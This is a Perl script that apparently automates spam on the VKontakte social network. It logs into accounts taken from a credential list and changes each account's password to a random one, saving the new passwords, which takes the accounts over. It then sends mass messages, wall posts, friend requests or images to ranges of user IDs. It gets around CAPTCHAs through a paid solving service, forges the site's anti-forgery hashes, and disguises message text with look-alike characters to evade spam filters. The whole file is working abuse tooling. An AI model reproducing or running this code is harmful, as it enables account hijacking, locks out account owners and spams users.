use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Cookies;
use AntiCaptcha;
use threads;
use threads::shared;
use Encode qw(encode decode);
use MIME::Base64 qw(encode_base64);
use Digest::MD5 qw(md5_hex);
use JavaScript;

# 
my $afile = './accs.txt';
#
my $delim = ':';

#<<url>> ; <<name>>
#
my $tfile = './text.txt';
# 
my $sfile = './status.txt';
#  
my $lfile = './link.txt';
#  
my $imdir = './img';
# 
my $imres = 'png';

# : 0 -  ; 1 - ; 2 -   ;  3 - 
my $stype = 0;
# : 0 -  ; 1 -  
my $gtype = 1;
# 
my $range = '40000000-60000000';
#  1     
my $mslmt = 50;
# : 0 -  ; 1 - 
my $cstat = 0;

# 
my $sname = 1;
# 
my $ssymb = 1;
# 
my $sgarb = 1;

# 
my $thrnm = 1;
#
my $delay = 8;

# 
my $acurl = 'antigate.com';
# 
my $ackey = '';

$| = 1;
my @trl = ();

my @alist : shared = loadf($afile);
my @tlist = loadf($tfile); my $tsize = @tlist;
my @slist = loadf($sfile); my $ssize = @slist;
my @llist = loadf($lfile); my $lsize = @llist;
my @imlist = glob "$imdir/*.$imres"; my $imsize = @imlist;
die "No images found\n" if $stype == 3 && !@imlist;
$thrnm = 100 if $thrnm > 100;
my ($start, $end) = split /-/, $range;
share $start;

my %stat : shared = (ok => 0, err => 0, cap => 0, hz => 0);

$trl[$_] = threads->create(\&main) for 0..$thrnm - 1;
$_->join for @trl;

sub main
{
 my ($ua, $ck) = browser();
 while(1)
	{
	 last if !@alist;
	 last if $start > $end;
	 
	 my ($login, $pass);
	 sleep 1 until ($login, $pass) = auth($ua, $ck);
	 if($login && $pass)
		{
		 change_status($ua, $login) if $cstat;
		 msleep(0.5);
		 if($gtype)
			{
			 my $frpage = $ua->get('http://vkontakte.ru/friends.php')->content;
			 while($frpage =~ /\[(\d+),"(.+?)","/g)
				{
				 message($ua, $1, $2);
				 sleep $delay;
				}
			}
		 else
			{
			 my $tlim = $mslmt;
			 while($tlim)
				{
				 my $tid;
					{
					 lock $start;
					 $tid = $start++;
					}
				 my $code = message($ua, $tid);
				 if($code == 2)
					{
					 sleep 1 until ($login, $pass) = auth($ua, $ck);
					 $tlim = $mslmt;
					}
				 sleep $delay;
				 $tlim--;
				}
			}
		}
	}
 threads->exit->detach;
}

sub change_status
{
 my ($ua, $login) = @_;
 my $page = $ua->get('http://vkontakte.ru/profile.php')->content;
 msleep(0.5);
 my $hash = $1 if $page =~ /activityhash' value='(.+?)'/;
 if(defined $hash)
	{
	 $ua->post('http://vkontakte.ru/profile.php',
		{
		 setactivity => encode('utf8', decode('cp1251', $slist[rand $ssize])),
		 activityhash => $hash,
		});
	 cout(' Status set ['.$login.']');
	}
 else
	{
	 cout(' Can\'t get activity hash ['.$login.']');
	}
}

sub message
{
 my ($ua, $id, $name) = @_;

 if($stype == 0)
	{
	 my $wpage = $ua->get('http://vkontakte.ru/id'.$id)->content;
	 
	 my $js = $1 if $wpage =~ /text\/javascript">\n<!--(.+?)<\/script/s;
	 my $whash = $1 if $wpage =~ /wall_post_hash.+?\('(.+?)'/;
	 $whash = hashme($js, $whash);
	 my $toid = $1 if $wpage =~ /"to_id" value="(\d+)"/;
	 $name = $1 if ($wpage =~ /\| (.+?)<\/title/ && !$name);
	 
	 if(defined $whash && defined $toid && defined $name)
		{
		 my $text = text($name);
		 my %req = (to_id => $toid, act => 'sent', wall_hash => $whash, message => $text);
			{
			 my $resp = $ua->post('http://vkontakte.ru/wall.php', [%req])->as_string;
			 if($resp =~ /captcha_sid":"(\d+)"/)
				{
				 inc('cap');
				 cout(" Captcha detected [ $id ]");
				 my $sid = $1;
				 my $key = captcha($ua, $sid);
				 $req{'captcha_sid'} = $sid;
				 $req{'captcha_key'} = $key;
				 redo;
				}
			 else
				{
				 analyze($resp, $id);
				}
			}
		}
	 else
		{
		 inc('err');
		 cout(" Can't send wmes to $id [privacy]");
		}
	}
 elsif($stype == 1)
	{
	 my $text = text($name);
	 my $ppage = $ua->get('http://vkontakte.ru/mail.php?act=write&to='.$id)->content;
	 my $secure = $1 if $ppage =~ /"secure" value="(.+?)"/;
	 my $chas = $1 if $ppage =~ /chas" value="(.+?)"/;
	 
	 my $js = $1 if $ppage =~ /text\/javascript">\n<!--(.+?)<\/script/s;
	 $chas = hashme($js, $chas);
	 
	 my $photo = $1 if $ppage =~ /"photo" value="(.+?)"/;
	 my $toid = $1 if $ppage =~ /"to_id" value="(.+?)"/;
	 
	 if(defined $secure && defined $chas && defined $photo && defined $toid)
		{
		 my %req = (act => 'sent', ajax => 1, misc => '', secure => $secure, chas => $chas, photo => $photo,
		 to_id => $toid, to_reply => 0, toFriends => '', title => '', message => $text);
			{
			 my $resp = $ua->post('http://vkontakte.ru/mail.php', [%req])->as_string;
			 if($resp =~ /captcha_sid":"(\d+)"/)
				{
				 inc('cap');
				 cout(" Captcha detected [ $id ]");
				 my $sid = $1;
				 my $key = captcha($ua, $sid);
				 $req{'captcha_sid'} = $sid;
				 $req{'captcha_key'} = $key;
				 redo;
				}
			 else
				{
				 analyze($resp, $id);
				}
			}
		}
	 else
		{
		 inc('err');
		 cout("  Can't send pm to $id [privacy]");
		}
	}
 elsif($stype == 2)
	{
	 my $apage =$ua->post('http://vkontakte.ru/friends_ajax.php', {act => 'request_form', fid => $id})->as_string;
	 my $hash = $1 if $apage =~ /"hash\\" value=\\"(.+?)\\"/;
	 $name = $1 if $apage =~ /href=\\"\\\/id\d+\\">(.+?)<\\/;
	 
	 $apage = $ua->get('http://vkontakte.ru/gsearch.php?from=people')->as_string;
	 my $js = $1 if $apage =~ /text\/javascript">\n<!--(.+?)<\/script/s;
	 $hash = hashme($js, $hash);

	 if(defined $hash && defined $name)
		{
		 my $text = text($name);
		 my %req = (act => 'accept_friend', fid => $id, hash => $hash, cats => '', verbose => 1, message => $text);
			{
			 my $resp = $ua->post('http://vkontakte.ru/friends_ajax.php', [%req])->as_string;
			 if($resp =~ /captcha_sid":"(\d+)"/)
				{
				 inc('cap');
				 cout(" Captcha detected [ $id ]");
				 my $sid = $1;
				 my $key = captcha($ua, $sid);
				 $req{'captcha_sid'} = $sid;
				 $req{'captcha_key'} = $key;
				 redo;
				}
			 else
				{
				 return analyze($resp, $id);
				}
			}
		}
	 else
		{
		 inc('err');
		 cout(" Can't invite $id [privacy]");
		}
	}
  elsif($stype == 3)
	{
	 my $img = loadb($imlist[rand $imsize]);
	 
	 my $ihash = encode_base64($img, '');
	 my $imdata = 
		"----OLEG-ANDREEV-PAVEL-DUROV-GRAFFITI-POST\r\n".
		"Content-Disposition: form-data; name=\"Signature\"\r\n\r\n".(md5_hex substr $ihash, 0, 1024)."\r\n".
		"----OLEG-ANDREEV-PAVEL-DUROV-GRAFFITI-POST\r\n".
		"Content-Disposition: form-data; name=\"Filedata\"; filename=\"graffiti.png\"\r\n".
		"Content-Type: image/png\r\n\r\n".$img."\r\n".
		"----OLEG-ANDREEV-PAVEL-DUROV-GRAFFITI-POST\r\n";
	
	 my $data = $ua->post('http://vkontakte.ru/graffiti.php?to_id='.$id.'&group_id=0', 
		Referer => 'http://vkontakte.ru/swf/Graffiti.swf?15',
		Content_Type => 'multipart/form-data; boundary=--OLEG-ANDREEV-PAVEL-DUROV-GRAFFITI-POST',
		Content => $imdata,
		)->code;
	 
	 if($data == 302)
		{
		 $data = $ua->get('http://vkontakte.ru/graffiti.php?act=last')->header('Location');
		 if($data)
			{
			 $data = $ua->get('http://vkontakte.ru/'.$data)->content;
			 my $grid = $1 if $data =~ /grid: '(\d+)'/;
			 my $whash = $1 if $data =~ /wall_hash: '(.+?)'/;
			 my $toid = $1 if $data =~ /to_id: '(\d+)'/;
		 
			 if(defined $grid && defined $whash && defined $toid)
				{
				 my %req = (act => 'sent', grid => $grid, to_id => $toid, wall_hash => $whash, message => $grid);
					{
					 my $resp = $ua->post('http://vkontakte.ru/wall.php', [%req])->as_string;
					 if($resp =~ /captcha_sid":"(\d+)"/)
						{
						 inc('cap');
						 cout(" Captcha detected [ $id ]");
						 my $sid = $1;
						 my $key = captcha($ua, $sid);
						 $req{'captcha_sid'} = $sid;
						 $req{'captcha_key'} = $key;
						 redo;
						}
					 else
						{
						 analyze($resp, $id);
						}
					}
				}
			 else
				{
				 inc('err');
				 cout(" Err while sending pic to $id [hash]");
				}
			}
		 else
			{
			 inc('err');
			 cout(" Err while sending pic to $id [loc2]");
			}
		}
	 else
		{
		 inc('err');
		 cout(" Err while sending pic to $id [loc1]");
		}
	}
}

sub analyze
{
 my ($str, $id) = @_;
 
 if(!$str) 
	{
	 inc('err');
	 cout('  err sending to '.$id);
	}
 elsif($str =~ /r\/id0/)
	{
	 inc('err');
	 cout('  err sending to '.$id);
	}
 elsif($str =~ /not allowed to add that many friends|     |     |      /)
	{
	 inc('err');
	 cout('  err sending to '.$id.' [limit]');
	 return 2;
	}
 elsif($str =~ /state":"request_accepted"/)
	{
	 inc('ok');
	 cout('  sent to '.$id);
	}
 elsif($str =~ /Location: login\.php/)
	{
	 inc('err');
	 cout('  err sending to '.$id.' [auth]');
	}
 elsif($str =~ /blank\.php\?code=3/)
	{
	 inc('err');
	 cout('  err sending to '.$id.' [limit]');
	 return 2;
	}
 elsif($str =~ /blank\.php\?code=2/)
	{
	 inc('err');
	 cout('  err sending to '.$id.' [spam]');
	}
 elsif($str =~ /blank\.php\?code=1/)
	{
	 inc('err');
	 cout('  err sending to '.$id.' [priv]');
	}
 elsif($str =~ /blank\.php| |Too fast/i)
	{
	 inc('err');
	 cout('  err sending to '.$id.' [fast]');
	}
 elsif($str =~ /r\/id\d+|\.<|was sent|rhttp/)
	{
	 inc('ok');
	 cout('  sent to '.$id);
	}
 elsif($str =~ /Unknown error/)
	{
	 inc('err');
	 cout('  err sending to '.$id.' [un-err]');
	}
 elsif($str =~ /Title:  /)
	{
	 inc('err');
	 cout('  err sending to '.$id.' [db]');
	}
 elsif($str =~ / IP /)
	{
	 inc('err');
	 cout('  err sending to '.$id.' [ip]');
	}
 elsif($str =~ / |Security error|check=1/)
	{
	 inc('err');
	 cout('  err sending to '.$id.' [secur]');
	}
 else
	{
	 debug($str);
	 #exit;
	}
}

sub text
{
 my ($name) = @_;
 
 my %shash = (url => $llist[rand $lsize]);
 if($name)
	{
	 my ($f, $l) = split / /, $name;
	 $shash{'name'} = $sname ? friendly_name($f) : $f;
	}
 else
	{
	 $shash{'name'} = ' ';
	}
 my $text = $tlist[rand $tsize];
 $text =~ s/<<(\w+)>>/$shash{$1}/g;
 $text = replace_char($text, 5) if $ssymb;
 $text = add_symbols($text, 3) if $sgarb;
 
 $text = encode('utf8', decode('cp1251', $text));
 
 return $text;
}

sub auth 
{
 my ($ua, $ck) = @_;
 $ck->clear();
 threads->exit->detach if !@alist;

 my ($login, $pass) = split /$delim/, shift @alist;

 my %request = (try_to_login => 1, vk => '', email => $login, pass => $pass, expire => 0);
 my $res = $ua->post('http://vkontakte.ru/login.php', {op => 'a_login_attempt'})->as_string;
	{
		if($res =~ / \.<\/div>/)
			{
			 cout('[-] '.$login.':'.$pass);
			}
		elsif($res =~ /vklogin/)
			{
			 $res = $ua->post('http://login.vk.com/?act=login', [%request])->as_string;
			 redo;
			}
		elsif($res =~ /Location: profile|vkontakte\.ru\/settings/)
			{
			 $res = $ua->get('http://vkontakte.ru/profile.php')->as_string;
			 if($res =~ /op=change_pass&mid=(\d+)&hash=(.+?)\n/)
				{
				 my ($mid, $hash, $newpwd) = ($1, $2, genran(7));
				 cout('[*] Change pass '.$login);
				#pt
				 my %chreq = (op => 'a_change_pass', mid => $mid, hash => $hash, oldpass => encode('utf8', decode('cp1251', $pass)), newpass => $newpwd, newpass2 => $newpwd);
					{
					 $res = $ua->post('http://vkontakte.ru/login.php', [%chreq])->as_string;
					 if($res =~ /captcha_sid":"(.+?)"/)
						{
						 my $key = captcha($ua, $1);
						 $chreq{'captcha_sid'} = $1;
						 $chreq{'captcha_key'} = $key;
						 redo;
						}
					 else
						{
						 $request{'pass'} = $newpwd;
						 writef('pass_changed.txt', $login.':'.$newpwd."\n");
						 $res = 'vklogin';
						}
					}
				 redo;
				}
			 else
				{
				 cout('[+] '.$login.':'.$request{'pass'});
				 return $login, $request{'pass'};
				}
			}
		elsif($res =~ /Location: (.+?)\n/)
			{
			 $res = $ua->get($1)->as_string;
			 redo;
			}
		elsif($res =~ /='s' value='(.+?)'/)
			{
			 $res = $ua->post('http://vkontakte.ru/login.php?op=slogin&redirect=1',
				{
				 s => $1,
				})->as_string;
			 redo;
			}
		elsif($res =~ /captcha_sid":"(.+?)",/)
			{
			 inc('cap');
			 cout('[~] '.$login.':'.$request{'pass'});
			 my $sid = $1;
			 my $key = captcha($ua, $sid);
			 $res = $ua->post('http://vkontakte.ru/login.php', {op => 'a_login_attempt', captcha_sid => $sid, captcha_key => $key})->as_string;
			 redo;
			}
		elsif($res =~ /remixpass=\S{32};/)
			{
			 cout('[+] '.$login.':'.$request{'pass'});
			 return $login, $request{'pass'};
			}
	}
 return 0;
}

sub captcha
{
 my ($ua, $sid) = @_;
 
 my $img = $ua->get('http://vkontakte.ru/captcha.php?sid='.$sid)->content;
 for(1..3)
	{
	 last if length $img > 300;
	 $img = $ua->get('http://vkontakte.ru/captcha.php?sid='.$sid)->content;
	 msleep(0.5);
	}
 my $answ = 0;
 my $ac = AntiCaptcha->new($acurl, $ackey);
 my $id = $ac->Recognize($img, 1);
 if($id)
	{
	 sleep 3 until($answ = $ac->GetStatus($id));
	}
 
 return $answ;
}

sub browser 
{
 my $ua = new LWP::UserAgent;
 my $ck = new HTTP::Cookies;
 $ua->cookie_jar($ck);
 $ua->requests_redirectable(0);
 $ua->agent('Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)');
 return $ua, $ck;
}

sub cout 
{
 my ($str) = "@_ [thread ".threads->tid()."]";
 $str .= " " x (78 - length $str) if length $str < 79;
 print $str."\n";
 $str = '';
 $str .= '[ '.$_.' - '.$stat{$_}.' ]' for keys %stat;
 print $str.'[threads: '.(scalar threads->list() + 1)."]\r";
}

sub loadf
{
 open(F, '<', $_[0]) || die $_[0].' - '.$!."\n";
 chomp(my @list = <F>);
 close F;
 
 return @list;
}

sub loadb
{
 local $/;
 open(F, '<', $_[0]) || die $_[0].' - '.$!."\n";
 binmode F;
 my $img = <F>;
 close F;
 
 return $img;
}

sub writef
{
 open(F, '>>', $_[0]) || warn $_[0].' - '.$!."\n";
 print F $_[1];
 close F;
}

sub debug
{
 open F, '>>', 'debug.txt';
 print F 'Time: '.scalar localtime(time)."\n".$_[0]."\n";
 close F;
}

sub msleep
{
 select undef, undef, undef, $_[0]
}

sub friendly_name
{
 my ($name) = @_;
 
 my %names = (
 ''=>'˸',''=>'',''=>'',''=>'',''=>'',
 ''=>'',''=>'',''=>'',''=>'',''=>'',
 ''=>'',''=>'',''=>'',''=>'',''=>'',
 ''=>'',''=>'',''=>'',''=>'',''=>'',''=>'',
 ''=>'',''=>'',''=>'',''=>'',''=>'',''=>'',
 ''=>'',''=>'',''=>'',''=>'',''=>'',''=>'',
 ''=>'',''=>'',''=>'',''=>'',''=>'',
 ''=>'',''=>'',''=>'',''=>'',''=>'',''=>'',
 ''=>'',''=>'',''=>'',''=>'',''=>'');
 
 $name = $names{$name} ? $names{$name} : $name;
 undef %names;
 
 return $name;
}

sub add_symbols
{
 my ($str, $r) = @_;
 $str .= chr(rnd(32,126)) for 1..$r;
 return $str;
}

sub genran
{
 my $str;
 $str .= chr(rnd(32,126)) for 1..$_[0];
 return $str;
}

sub replace_char
{
 my ($str, $r) = @_;
 
 my %rep = (
			'' => 'a', '' => 'A', '' => 'B', '' => 'e', '' => 'E',
			'' => 'o', '' => 'O', '' => 'p', '' => 'P', '' => 'H',
			'' => 'u', '' => 'T', '' => 'c', '' => 'C', '' => 'M',
			'' => 'K', '' => 'x', '' => 'X',
			);
 
 my $res;

 for my $char(split //, $str)
	{
	 if(int rand 2 && $rep{$char} && $r > 0) #, ,      
		{
		 $res .= $rep{$char};
		 $r--;
		}
	 else
		{
		 $res .= $char;
		}
	}

 undef %rep;

 return $res;
}

sub rnd
{
 return $_[0] + int rand $_[1] - $_[0] + 1;
}

sub inc
{
 lock %stat;
 $stat{$_[0]}++;
}

sub hashme
{
 my ($js, $hash) = @_;

 my $rt = new JavaScript::Runtime;
 my $cx = $rt->create_context();
 $cx->bind_function(write => sub { ($hash) = @_ });
 
 $js =~ s/window\[.+?\]/0/g;
 $js =~ s/window\.//g;
 $js =~ s/\}\)\(\);/\}\);/g;
 $js = "var hash = '$hash'".$js.'write(decodehash(hash));';
 $cx->eval($js);
 substr $hash, -9, 4, '';
 
 return $hash;
}